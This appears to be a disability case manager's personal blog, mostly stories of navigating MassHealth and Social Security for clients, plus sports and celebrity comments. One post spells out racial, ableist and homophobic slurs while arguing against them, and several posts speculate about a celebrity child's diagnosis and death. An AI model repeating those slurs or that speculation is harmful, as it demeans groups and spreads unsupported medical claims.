I HATE MASSHEALTH!
I have a new client.  She is severely disabled, and became that in January of this year.  She had to get her gall bladder removed, which was successful.  After surgery she was give morphine, and either overdosed or had an allergic reaction to it (Hospital won’t say which and her lawyer is still investigating).  This left her in a coma for about month and she came out with brain issues.  Mobility and balance issues, severe speech impediment, cognitive functioning issue, gross and fine motor issues.  Because of the speech impediment and cognitive issues, she is having a difficult time applying for things on her own.  She has moved in with a friend who has been helping her with her personal care needs for 4 months.

She is on welfare for the disabled and I just sent out her application for disability this week.  Here is the big issue.  For some reason she is on MassHealth Basic (MassHealth is MA Medicaid).  That is the bare bones for medical insurance.  I don’t know anyone on welfare or disability that does not have MassHealth Standard.

So, because of the insurance issue, she can not get her friend paid for homecare, she cannot get transportation to Dr’s appointments, she cannot get a wheelchair or other mobility devices, and she ends up with huge co-pays.  Did I tell you she makes $303 on welfare?  I have no idea why she was put on this, nor does anyone else I have talked too.

Now many of you know I HATE DEAL WITH MASSHEALTH.  I would rather deal with Public Housing Office, Social Security, The Department of Child and Welfare . . . anyone but MassHealth.  Because of the speech impediment no one will spend time with her of the phone.

So I called MassHealth yesterday.  For me to do that I need the client present so I did it from her apartment.  I got someone on the main MassHealth number, but they could not help me, because the case is out of the Taunton Office, but the person I spoke from MassHealth, who also could not understand why she was on Basic, had to transfer me over there.  So it begins, the world famous MassHealth transfer.  She also gave me the direct line to the office “just in case”.  Well I spent 45 minutes on hold and NO ONE  picked up the phone.  I just kept getting the “All our operators are busy” crap.  So I told her, I would return in the morning and call then.

Well I did and guess what, 45 minutes on hold again.  So, knowing I might have to this.  I am picking her up tomorrow and we are heading to the Taunton Office, because that seems to be the only way to get anyone.

Now just imagine where this woman would be without me?   Her and her friends have been trying to do this for the past 4 months . .  I don’t even remember how she was referred to me.

After watching tonight Deadliest Catch, and watching the death of Captain Phil Harris after his stroke, I decided to play this song they used to end the program with as a HUGE winter storm hit the fleet and Phil dies in a hospital after having another stroke while recovering for the other.  Whole last 10 minutes was pretty powerful and heart wrenching.  RIP Captain Phil Harris.

George Steinbrenner, master of the Evil Empire died today.  RIP George, you had a crazy public persona, and we hated you, yet without you, the Red Sox don’t become what they became.  Also you were very generous yearly to the Red Sox Charity the Jimmy Fund, and we came to kind of like you for that.  So yes, Ding Dong the Witch is Dead, but things won’t be the same.

KMP Softball update
So, we finally got some rain tonight, but it was too bad to cancel our game until the last two inning, but we stuck it out.  I pitched my 3rd (4th) shutout of the season, and we won 5 – 0.  Again amazing defense.  The team is in a slight hitting slump, but we play this same team tomorrow and hope to break out of the slump.  I was hoping the rain would cool things off around here, but no, it actually increased the humidyt.  It is right now no longer raining and 78 degrees, with 96% humdity.  It is supposed to rain some more tomorrow . .

Recently the CDC as well as some other scientists began disputing the claims of people who say the link, including other researchers.  Even more recently a leading Danish research groups funded a number of key studies into it and came to the conclusion that there was no connection . .

Ok, something has inspired today to write a little about the words we use.  I am going to actually use words I never use, or write for the point of this article.  I am a big proponent of free speech and think you should be allowed to say anything you want, whenever you want.  But I also think that if you are going to do that, you need to be prepared for what you say, and take responsibility for what you say.  I also understand this has become a ultra PC world, so just about anything you say can insult someone in someway.

I want to talk specifically about the words retard, nigger, and fag and all it derivatives.  I assure you it pains me to type those three words.

This is partly in response to the recent Sarah Palin thing about the word “retard”.  For once, I partially agree with Sarah, and glad she went after both sides of the aisle.  The word “retard” and “retarded”.  Those two words are so loosely thrown around today.  When you use the word in this way:  ”You retard! That’s retarded!” You are applying a meaning to that word.  That meaning Stupid, Ignorant, Unimportant, and Second Class.  There is an actual medical definition called “mentally retardation“.  Working with persons with disabilities, especially thousands of people with mental retardation I can assure you of this.  None of those people are stupid, idiotic, unimportant, or second class.  So when you call something “retarded” or someone a “retard” and connetating those words with stupidity, you are basically calling a whole class of people stupid who have mental retardation.  This has become a more recent phenomenon in the PC world, but I see it constantly with co-workers, friend, etc.  It has gotten so bad, that people no longer call people with mental retardation, “mentally retarded”.  They say they are Developmentally Delayed or MR.  It has even gotten to the point that the State’s Department of Mental Retardation changed it name this summer to the Department of Developmental Services as the “r-word” has gotten such a bad rep among the community.

So, to compare to the word “nigger”.  That word has always been used to calls something or someone Stupid, Ignorant, Unimportant, or Second Class.  Years ago calling anyone a “nigger” or calling someone “niggerish” was exactly the same as “retard” or “retarded”.  The world was used for years as a way for one class of people to put down a whole race of other people.  I can’t imagine anyone calling any of their friends of color “nigger”, and I would expect you would get assaulted or worse if you just loosely started using that word.  Yes, I understand that some black people use it with other black people, but again, I know a lot of my black friends who will use it to call other black stupid.

And the same thing has happened to “Fag” and “Faggot”.  Those two words have come to mean Stupid, Ignorant, Unimportant, and Second Class.  So now we are associating a slang word for a gay male, with Stupid, Ignorant, Unimportant, and Second Class.

So let me get off my high horse then . . I have a bad taste in my mouth anyway.  My point is people in power should be more consciencious of what they are saying, I don’t think either of those guys would use the n-word.

So I made a client $38,000 in three hours, what did you do today?
First let me tell you about this client.  55 year old hispanic women, with mental health issue, and severe Osteo-arthritis, so bad, she has to walk with a walker and is in constant pain. 

In 1992, before she was disabled, she was coming off a DV marriage, and living with a drug dealer.  The apartment that they were living in got raided, and she was the only only one present.  She of course was arrested and charged with Drug Trafficking.  The fellow she was living with split the country.  Already having some underlying mental health issues, she ran away in the middle of the trial to another part of the state.  Lived out the next 10 or so years, working and such.

2005 rolls around and she has applied for SSDI (Disability) and been approved.  She get her first check, and later that week, where she is living gets raided in the middle of the night, she is arrested brought back to the city, tossed in jail.  The found her guilty in absentia, back in ’92, and they issued a warrant.  When she applied for Disability it caught up to her.  You cannot collect in prison so that was that.

Flash forward 4 years to 2009, she has spent the past 4 years at MCI.  She finds a on the ball public defender, who realizes she never really got a fair trial, gets her an appeal.  The appeal is November 30th 2009.  Her guilty verdict is overturned, and continued to drop all charges this month.  Classic case of the drug laws guilt by association.

So it typical prison fashion, she is uncuffed at the courtroom, and told she is free to go.  No money, no place to live, nothing but prison clothes, no health insurace, no welfare, no SSDI, just free to go.

She wanders a bit and finds her brother is living in the city, so she moves into his subsidized apartment and the two of them begin to seek services.  This is of course during the holidays and my vacation, so by the time she is referred to me, it is last week.  So I visit, and find a few things I can help her.  First, someone had already got her on MassHealth (Medicaid) and Welfare/Foodstamp benefits.  Of course, my thought is why she is not back on SSDI.  So I make an appointment with her to go today.

Knowing I usually spend a couple hours there, we go early, and get called right up right away.  They start her benefits back up, and then tell us to wait for someone to call us in the waiting room as her SSDI benefit was low enough to also qualify for SSI through the state.  So we sit and wait.

2 and half hours later, we meet with one of the supervisors.  We sit down, tell her they wanted us to also apply for the SSI.  So she starts the process, punches in her name.  Immediately the look comes over her face and all we hear is “HOLY SHIT”.  Then she say “Oh, you ain’t gonna qualify for SSI, we owe you $38,000″.  Well needless to say the client almost has a heart attack, and even I am kind of taken aback.  I figured there might be a little back payment, but this was for about 5 years.

So, here what happened.  Social Security recently settled the Martinez lawsuit.  This I knew.  The case was a class action suing Social Security for taking benefits away when some had an arrest warrant.  Social Security had decided that is exceeding unfair as someone with a warrant has not been convicted of anything yet.  So, between the arrest warrant time and the 4 year and then being acquitted, this woman went from having absolutely nothing to a nice little chunk of change.  Amazing.

So, have you ever earned someone $38K in just under 3 hours?  Man I should work on commission.

Once again Malach working miracles!
Malach has been working with a client now for about 2 years with Stiff Person Syndrome.  As you can see by the wiki article, it is exceedingly rare, with perhaps maybe 10,000 to 15,000 people in the world suffering from it.

Once a very vibrant intelligent woman, SPS has robbed her of income, mobility, some brain functioning, and her life.  She was referred to me via Ted Kennedy’s Office, and at the time she was homeless, with her only income being welfare.  A lawyer had screwed her SSDI case, she did not qualify for SSDI because she was self employed most of her life, and did not put anything into Social Security, so the lawyer basically robbed her blind.

When she came to me, I got her in one of our housing unit, with a subsidized $90 a month rent, and started case managing her.  We immediately investigated why she was not on disability, found out her lack of qualifications, and immediately applied for SSI.

Next problem, because she had been floating around homelessness for several years, she hadn’t seen a Doctor in a while, so their was not expert on her condition, and anyone to help with her SSI application.  So I went to work on that.  I got her a new primary care, who was willing to work with her rare condition, of course by the time we saw the Doctor, she had deteriorate from the seizure, muscle spasm, pain, her diabetes were all out of wack, she had lost eyesight from that in one eye, and of course her meds were all messed up.

So Malach worked, and actually found her a Doctor with some studying on this who was looking for a patient in this, and only worked 15 miles away.  So, about 8 months after applyying, everything is set up and in, and we are waiting for word from Social Security about SSI.  All this time, about a year and half since I first met her, she was only getting $205 a month from EAFDC (welfare), had been homeless with her college age son, living place to place, and had lost her house.

So, on Thursday I get a call from her saying she got a letter from Social Security saying they were closing her case as “she has indicated she no longer want to persue it”.  That came way out of left field.  To top it off DTA cut off her EAFDC because she was not complying with Social Security. 

Something was definitely wrong, we never got anything from Social Security saying this before, and we had attended all the appointments they wanted us too.  So, we took the letter to the local office today.

Malach dragged her in, in her wheelchair, spent our two hours in waiting pergutory and got to see someone.  Guess what happened?

She had been approved in October, and Social Security sent the approval letter to the wrong address.  Not sure why, there were no changes to her address, but they did.  So when they did not hear from her about accepting, they assumed she didn’t want it.

Long story short, we got the mess fixed, and starting next month she will get her first $785 check.  In addition, Social Security is going to back pay her to August of 2006, when she first applied for the SSDI.  So this poor woman, who basically has had enough even to eat on some days is tripling her monthly salary, and get a back payment of almost $30,000 (split up over the next 5 years).

That is what Malach does for work.  Solve disability issues and it’s tons of fun.

I have dealt with much worse seizures in my years of doing this, but these are weird.  Lots of pain with the spasms, the client doesn’t lose conciousness of their surroundings, and it involves seizures of the disaphragm which messes breathing up.

Hey, Muddy, Malach agrees with you about Marijuana being legal.  Malach does not smoke, but I see little difference between booze and pot.  In fact, I have known plenty of drunks and stoners in my life, and in general stoners are less likely to get violent.  I also have a number of clients who get a ton of relief from reefer.

I also got a client who has been arrested 47 time for possession of pot . . .

As predicted by Malach, and Malicious Intent, John Travolta admitted in court today, his recently deceased son was Autistic.  This one of the problems I have with Scientology, which basically teaches if you suffer from disability, it is because of the bad influences in your life, your Thetans . . .

Imagine now, his son, from all accounts severely Autistic, and all that was happening to him was probably Audits?  Hate to throw the blame game around here, but religions like Scientology, that deny medical help to their worshippers and their children are one of my pet peeves.

So, Malach the other day, took a client up to Boston for a Social Security Appeal.  While I applaud Social Security for making it harder to get on SSI and SSDI, I got 3 cleints right now who have been denied who should of not been denied, and the appeal process takes about 2 years.

So, having never been to the Office in Boston (usual our appeals in South Eastern MA are in Providence, I check directions to get up there, thinking I would pick up the T out of the city, ride in and walk to the Office.  If you have never been on the Boston Subway, it is a very excellent system, and I use it all the time.

So, I checked the MBTA website it see where the closest stop was to the building I was going to.  According to their website, that would be 1 mile away.  This surprised me quite a bit, but the client I was with could not handle that walk, so I drove into the city.

The building I was going to was only a few blocks from Faneuil Hall, so that gave me my first indication the MBTA website was mistaken.  I find the building rather easily, drop the client off in front, and find a place to park.  If you have never been to Boston, forget parking on the street, will take you hours for a free spot, and metered parking is a quarter every 15 minutes, limited to 45 minutes, so I knew I could not park there.  But there are plenty of lots, and garages one can park in.  I found one a block away.

Now parking in Boston is expensive, more on that after.  So I walk back to the building and lo and behold, 30′ from the entrance of the building is the Bowdoin T Stop.  DAMN YOU MBTA! 

So the were there at the Social Security Office about 2 1/2 hours, which if you never been to a Social Security Office, is pretty good time, the client and I walk back to where my car is parked.  The Valet gets the car, and I head out.  There is a machine you can slip a credit card in to pay.  I slip in the ticket, and remember I told you it was expensive to park in Boston?  $45.  Luckily, my employer will reimburse me for it, but $45!  It only cost me and my family $40 to eat at Red Robin last night.

What cheeses me off the most, is that if I had taken the T from Braintree, it would cost $5 to park, and about $10 for me and the client to ride the T.

This is going to be an interesting case
Malach has worked with intergender, and trans gender individuals before, and there is always a question of sexuality.  I have had 1 intergender client, and 2 transgender, they were all homeless, and issue was what shelter to put them in.  Female shelter?  Male Shelter?  In all these cases not one shelter would take them.

Luckily, my work place runs a male and female shelter, and we have a small private room there for these kind of cases.

It will be really interesting to see where this goes in the athletics world. If for example Semenya is intergender, she has enough Male hormones to make her more dominant in female sports, but not enough to compete with men.

Brady Baby part II!
Well, that Tom Brady, he is just fertile!  Given all these women the snakes he is!  So, if the Brady/Bundchen Baby ain’t the next evolution in humanity, I don’t know what is.

9/11
So, my kid school today, did a little something about 9/11 for the first and second graders.  Now they did not show them any footage, but the talked a bit about what happened.  Especially in second grade, all those kids were born 2001/02.  My son was born almost 2 months exactly after 9/11.

I had a nice discussion with them over dinner about it, what happened on that day, as much as they asked.  Neither of them was interested in video footage, just as well, I am sure sooner or later, they will see it.

Curt Schilling annouced today that his 9 year old son has Asperger’s Sydrome.  While I don’t wish that on anyone, Schilling is such a great spokesman and advocate for a number of charities and health issues, he has now become one of Autism and PDD’s.  DMDSS wish Curt Schilling all the best.

Wow, nice series ending, not that me and didn’t have that as one of our predictions.  Gonna buy the whole series, it is worth watching.  I especially liked when they drove Galatica into the sun, and the old music from the original series played.

Special Olympics and Barack
I have volunteered with Special Olympics now for about 12 years.  I love it, and totally support their new campaign.  Now as for Barack on the Tonight Show.  I know he intent was an attempt to be funny, but he went about it wrong.  While I agree 129 is a good SO Bowling Score on average, he still should not have said it, most of the world thinks this way, and if not for the Democrats, their ain’t not disability services, so he will get a bit of a pass.

Natasha Richardson
This is a sad story.  And dealing with the number of Brain Injured clients like I do, I can feel for her family.  Death is sometimes better than living with severe brain injury.  Beautiful women, her and Liam Neesom seemed to have a model marriage, rare in Hollywood.  RIP.  Perhaps this will bring more of a notice to brain injury, especially among our veterans.

Not only do I have client experiences with this via clients, I got a really severe concussion from a car accident I had when I was about 18.  It did not result in permanent damage (well not a lot), but could of pretty easily.  The situation was pretty bizarre.  A large old cadillac was speeding through back roads in Fairhaven, and went through a stop sign, we hit corner to corner, my little sports car, the driver spun me out and down the side street into a pole, she went careening across the intersection smashing into a house, into the stone cellar.

I remember little of the accident, or the day around it, only flashes.  I hit my head really hard, and was not wearing a seatbelt.  Considering that I was pretty lucky not to be brain injured, paralyzed or dead, as I was launched into the windshield, but somehow managed to stay in the car, and my seat.  One thing I have always had is good reflexes, mainly why I have always been a good pitcher.  I really think that saved me. 

The whole thing was strange, because of my severe concussion, I refused medical attention. I was allowed to leave the scene of the accident, shirtless and shoeless (I was going to the beach) by paramedics and police with a bloody bandage wrapped around my head, and somehow ended up at my Father’s Gas Station, 3 miles away.  Still don’t know if I walked or some good Samaritan gave me a ride.

Parents took me to the hospital, where I spent time with the women in the other vehicle berating me (don’t remember that either).  To this day, what I do remember?  A big flash of purple coming out of some bushes on the edge of the corner side street.  That big purple car sticking out of someone’s cellar.  Driving up the circular driveway to St. Luke’s Hosptial Emergency Room, lying on a gurney in the emergency room hallway, some asking me if anything hurt, telling them my right knee did.  They cut my pants leg open, and there was a key sticking out of my knee.

So, I visited with the son and father I talked about last night this morning, and decided to call a Nursing Home he spent some time in a few months ago, and guess what, Malach convinced them to take on the client, to give Malach time to sort his life out.  He starts there tomorrow.  Now, I can begin to work my magic, PCA services, better housing and Masshealth.  I LOVE MY JOB!  That is why the world refers it’s tough cases to me!  WHO DA MAN!

I was very hesitant to weigh in on the death of John Travolta son, but a lot of things bother me about this.  There has been a raging debate across the Internet and media on whether or not Jett Travolta was autistic.  He had many of the classic symptoms of Autism but, because of Travolta and Preston’s belief in Scientology, they essential did not believe is Autism.  Jett was diagnosed with Kawasaki disease, and very rare auto-immune disorder thought to be brought on in very young children by certain chemicals.  It is much more common is Japan, and among males 5 and younger.  The problem the diagnosis, it is it not known to cause developmental delays, nor the social issues Jett had.  For all indications he did not even talk, and was very susceptible to sensory stimulation, hallmarks of Autism and not Kawasaki disease.  I just fear, because of their belief in psychological issue, the family refused to acknowledge the correct diagnosis, which of course can be accompanied by seizure activity.  Again, I just fear, this was a needless death.
